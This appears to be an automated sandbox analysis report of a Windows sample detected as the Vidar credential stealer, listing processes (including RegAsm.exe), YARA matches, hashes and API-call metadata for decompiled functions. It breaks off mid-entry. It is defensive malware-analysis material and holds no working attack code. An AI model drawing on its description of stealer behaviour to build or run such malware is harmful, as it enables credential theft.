2024-04-26 09:03:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:02:50
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x9d0000
File size:	407'040 bytes
MD5 hash:	4B46A0105CCB6A18F9872C93F12D06FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:02:50
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:02:50
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xec0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.5%
Total number of Nodes:	536
Total number of Limit Nodes:	17

Executed Functions

Function 009EA789 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
Instruction ID: 5cc39392da494c262e846be1202127d86dd779f07f594395aed19beca49627d9
Opcode Fuzzy Hash: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
Instruction Fuzzy Hash: AAE08C72912268EBCB16DBCAC904A8AF3FCEB84B00B1508A6F502D3210C270EE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 009E0E87 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
Instruction ID: 0952d4469ea3aefa3dd65a7c17f08a926d23dc7fa880252a7db63faa9f13875e
Opcode Fuzzy Hash: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
Instruction Fuzzy Hash: 7EC08C34010A808BCF2B89118371BA63378B3D6782F801C9CC44B0B642D55EACC2D601

Uniqueness

Uniqueness Score: -1.00%

Function 009E59BC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,CEFD0730,?,009E5AC9,?,?,00000000,00000000), ref: 009E5A7D

Strings

api-ms-, xrefs: 009E5A13
ext-ms-, xrefs: 009E5A27

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 678bc6362808073120de034417902c7676298004c60447472abd70873db6bc01
Instruction ID: d9021984bfbf930fc9c806dd29e6cd4e37948fcc6ecc24d5ea4d41310cb47fef
Opcode Fuzzy Hash: 678bc6362808073120de034417902c7676298004c60447472abd70873db6bc01
Instruction Fuzzy Hash: 0E210D32A05651EBCB239B62EC94A6B375CDF41779F1A0230EA19A7290DB34ED00D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 009E69BB Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 009E6A42
__alloca_probe_16.LIBCMT ref: 009E6B03
__freea.LIBCMT ref: 009E6B6A

Part of subcall function 009E45C0: HeapAlloc.KERNEL32(00000000,009D4449,?,?,009D8DF4,?,?,?,?,?,009D21CC,009D4449,?,?,?,?), ref: 009E45F2

__freea.LIBCMT ref: 009E6B7F
__freea.LIBCMT ref: 009E6B8F

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: a2671b17240fcc7e93a29c389624c26b401b97afd40a17e5a09ea392d8c24b09
Instruction ID: 200041e3421df77bd43cfe73e3f9041edeffa2bebc0bbd59fabead0e9ecd29a2
Opcode Fuzzy Hash: a2671b17240fcc7e93a29c389624c26b401b97afd40a17e5a09ea392d8c24b09
Instruction Fuzzy Hash: CC51E772600296AFDF229FA6CC41EBB3AADEF54790B194629FC18D7111EB31DD1087A0

Uniqueness

Uniqueness Score: -1.00%

Function 009F3416 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009D1F47: _strlen.LIBCMT ref: 009D1F5F

VirtualProtect.KERNELBASE(00A34018,000004AC,00000040,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 009F3468
FreeConsole.KERNELBASE ref: 009F346E

Strings

006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 009F3427

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleFreeProtectVirtual_strlen
String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
API String ID: 1248733679-32248209
Opcode ID: f0866fe0d9a7184cbd51c90316ffb2a7df9daeb6f0b41a65f5cb8d4da7a86cb0
Instruction ID: 0735fe11c84e5072c0cb8395ed0cfba2ae29d2bc2973ca0ce6ef4a2ddcb08ace
Opcode Fuzzy Hash: f0866fe0d9a7184cbd51c90316ffb2a7df9daeb6f0b41a65f5cb8d4da7a86cb0
Instruction Fuzzy Hash: 3C018F71A44208ABDB04EBA8EC46BBE77A4AB85700F54C026F601E72D1DF689A058759

Uniqueness

Uniqueness Score: -1.00%

Function 009E0E13 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,009E0E0D,00000000,009DAAD2,?,?,CEFD0730,009DAAD2,?), ref: 009E0E24
TerminateProcess.KERNEL32(00000000,?,009E0E0D,00000000,009DAAD2,?,?,CEFD0730,009DAAD2,?), ref: 009E0E2B
ExitProcess.KERNEL32 ref: 009E0E3D

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 359b490de54e6bfaca5cb5d9c196c0ba91245de1bcbc6a84dc566aa665c62b5c
Instruction ID: 49217735da878fe63905d991885dcc8c7e9697251a971f4a493132569f836636
Opcode Fuzzy Hash: 359b490de54e6bfaca5cb5d9c196c0ba91245de1bcbc6a84dc566aa665c62b5c
Instruction Fuzzy Hash: 24D09E31014144BFCF022F61EC0E96E3F29AFC43517184428BA4956031CFB59DD6EB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E8126 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009E7870: GetConsoleOutputCP.KERNEL32(CEFD0730,00000000,00000000,00000000), ref: 009E78D3

WriteFile.KERNEL32(?,00000000,?,009FD558,00000000,0000000C,00000000,00000000,?,00000000,009FD558,00000010,009DF70D,00000000,00000000,00000000), ref: 009E828F
GetLastError.KERNEL32(?,00000000), ref: 009E8299

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 83d37085567cffb9f4ef72fdc8bd72904242ef48c64acbe845048eaf6d69c0df
Instruction ID: eb3efa73abf661d90d65a51445d78d25363cace22b02d55f932f46c27b940af0
Opcode Fuzzy Hash: 83d37085567cffb9f4ef72fdc8bd72904242ef48c64acbe845048eaf6d69c0df
Instruction Fuzzy Hash: 5561B071D08189AEDF128FEAC844BEFBBBDAF49304F144489E918A7252DB35DD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009EA0BA Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009E9BEA: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 009E9C15

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,009E9F01,?,00000000,?,00000000,?), ref: 009EA11B
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,009E9F01,?,00000000,?,00000000,?), ref: 009EA15D

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: fdac0e632f4143b11143ae532380c7772d3aec72efed90c8df3ca03258aba950
Instruction ID: 49dc0dcc73ea3c2e6737b28b8b78c9a199695ff10d94367e64d7f8942b432e94
Opcode Fuzzy Hash: fdac0e632f4143b11143ae532380c7772d3aec72efed90c8df3ca03258aba950
Instruction Fuzzy Hash: 3A515870A042858FDB22CF76C8846BABBF9FF81300F18446ED19697261D775AD46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009D57BD Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Fputc.LIBCPMT ref: 009D5896

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: 57d660d8d2091881a56915207beae97d2b1a7832dd464e10311aabb42b1a84eb
Instruction ID: 851290a95b00e8185925e346a4e0e6f9c37a0721efb575d72cede39763180c98
Opcode Fuzzy Hash: 57d660d8d2091881a56915207beae97d2b1a7832dd464e10311aabb42b1a84eb
Instruction Fuzzy Hash: 2A41A036951A1AABDF15DFA4C8809EDB7B8FF08314B158027E801E7740EB31ED41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E7D28 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,009E8275,00000000,00000000,00000000,?,0000000C,00000000), ref: 009E7DC4
GetLastError.KERNEL32(?,009E8275,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,009FD558,00000010,009DF70D,00000000,00000000), ref: 009E7DEA

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 0e520f3b9620255d82f603a0e445c2f703d22d00959997fb5ce885bfd02edb9b
Instruction ID: 3a7332ee1f8f62d4bff3d2e2cd373b05c677a0dcde8980722ac7f1298828bd16
Opcode Fuzzy Hash: 0e520f3b9620255d82f603a0e445c2f703d22d00959997fb5ce885bfd02edb9b
Instruction Fuzzy Hash: 80218031A042599BCB1ACF6ADC80AE9B7B9FF48301B1444A9EA06D7251D630AD82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 009E56AA Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009E56F6
GetFileType.KERNELBASE(00000000), ref: 009E5708

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d81c58cf5c07b71b9a708a67fc3a1cf977a804bffdc494d3d135070b4ee9330b
Instruction ID: f58f56503e19e49f8d131c3ea2c3dbd4e09446fc2836fe268c85486873152c59
Opcode Fuzzy Hash: d81c58cf5c07b71b9a708a67fc3a1cf977a804bffdc494d3d135070b4ee9330b
Instruction Fuzzy Hash: FE11E175504F8186C7324E3F8C88236BA98AB56378B3A0B1AD6B6C72F1C735DC92D600

Uniqueness

Uniqueness Score: -1.00%

Function 009E5E56 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,009E6AA9,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 009E5E8A
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,009E6AA9,?,?,00000000,?,00000000), ref: 009E5EA8

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: e5cede3251d6ce5d5083c31290c6bcaaf1d4475d652d4e9b826f5265e2bb5402
Instruction ID: fffe80e09520b3f28240f856206020f3e3961c6aa686907040958d75f1d42eee
Opcode Fuzzy Hash: e5cede3251d6ce5d5083c31290c6bcaaf1d4475d652d4e9b826f5265e2bb5402
Instruction Fuzzy Hash: 16F0683240055ABBCF136F91DD05DEE7F66AF48365F064114FA1825120CA36C972AB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E9CBE Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,009E9F0D,009E9F01,00000000), ref: 009E9CF0

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 0571f9d00fb209d86079c0776b28b21f29dd18b1452d3ca3da621d60969066ce
Instruction ID: c4e5bc97195380b1bafcd160216d215d46788a2490fd68fde208cf10320261d7
Opcode Fuzzy Hash: 0571f9d00fb209d86079c0776b28b21f29dd18b1452d3ca3da621d60969066ce
Instruction Fuzzy Hash: FC515B719082989FDB22CA29CD80BF67BBCEB56304F2405EDE59AD7182D3349D85DF20

Uniqueness

Uniqueness Score: -1.00%

Function 009E5A87 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9fa298cb183102d0d9913e0201f27ffbc38dc607b0924cd65cfc3189e971e2
Instruction ID: 57fb3ab841fd8d054a6dfd30c195c3c93762301a6435980c75618b54e78aa770
Opcode Fuzzy Hash: 7f9fa298cb183102d0d9913e0201f27ffbc38dc607b0924cd65cfc3189e971e2
Instruction Fuzzy Hash: 4C01F5336186519B9B139E6BEC80A6B339AABC432432E4530FA04DB194EE34DC40D780

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009ED4F1 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 009ED6D5

Strings

1#QNAN, xrefs: 009ED604
1#IND, xrefs: 009ED5F6
1#SNAN, xrefs: 009ED5FD
1#INF, xrefs: 009ED627

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: bdd39c1c605ea851440672e246eff87d6eff7fb69aca46512c2dcbd5a7d95696
Instruction ID: d14c377cd2742f7420a833d6383cbb632cbe2cebb070fc72759d66476a1d8365
Opcode Fuzzy Hash: bdd39c1c605ea851440672e246eff87d6eff7fb69aca46512c2dcbd5a7d95696
Instruction Fuzzy Hash: 38D23A71E092688FDB66CE29DC407EAB7B9EB44305F1445EAD40DE7240EB78AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 009EC951 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,009ECC6F,00000002,00000000,?,?,?,009ECC6F,?,00000000), ref: 009EC9EA
GetLocaleInfoW.KERNEL32(?,20001004,009ECC6F,00000002,00000000,?,?,?,009ECC6F,?,00000000), ref: 009ECA13
GetACP.KERNEL32(?,?,009ECC6F,?,00000000), ref: 009ECA28

Strings

ACP, xrefs: 009EC96F
OCP, xrefs: 009EC9A5

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 17eef61c7fa08f4ea465379326695522eaa05b59f0b34c5f7f07ed8452edaf49
Instruction ID: e4e83d752364012db7af5e5515f4aa45f6dfc60b3e9fc5b2204b144190d40f64
Opcode Fuzzy Hash: 17eef61c7fa08f4ea465379326695522eaa05b59f0b34c5f7f07ed8452edaf49
Instruction Fuzzy Hash: BD21D3F6650188EAD736CF56C901BA773ABAF54B60B168434E989D7202F732DD42D350

Uniqueness

Uniqueness Score: -1.00%

Function 009ECB26 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

